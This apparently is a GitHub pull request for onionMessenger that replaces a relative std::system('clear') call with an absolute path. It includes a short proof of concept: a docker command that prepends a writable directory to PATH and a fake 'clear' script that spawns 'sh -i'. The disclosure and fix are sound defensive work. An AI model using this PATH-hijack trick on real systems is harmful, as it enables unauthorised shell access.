### PR TITLE
Report bug and Fix

### DIFF
--- a/onionMessenger/messenger.cpp
+++ b/onionMessenger/messenger.cpp
@@ -14,7 +14,10 @@ using namespace PGPCrypt;
 namespace newmsger{
 
     Messenger::Messenger(){
-        std::system("clear");
+        // std::system("clear");
+        // Use absolute path rather than relative path with system function
+        // It can be attacked using PATH env variable
+        std::system("/usr/bin/clear");
         CheckIP();
 
         string githubID = "";


### PR DESCRIPTION
There is a system function with relative path.
If attacker modify PATH environment variable, can get a shell

However, this attack has very strong assumption.
So, I think it is not critical issue.

exp.sh
```
docker run -e PATH=/home/onionMessenger:$PATH -w /home/onionMessenger -it onionmessenger /bin/sh -c '../setup.sh; ./onionMessenger' 
docker rm -v $(docker ps -a -q -f status=exited)
```

clear
```
#!/bin/bash
echo "Spawn a Shell!!"
sh -i
```

![image](https://user-images.githubusercontent.com/9199607/38384271-a6168998-3949-11e8-8a7c-c93042370b42.png)
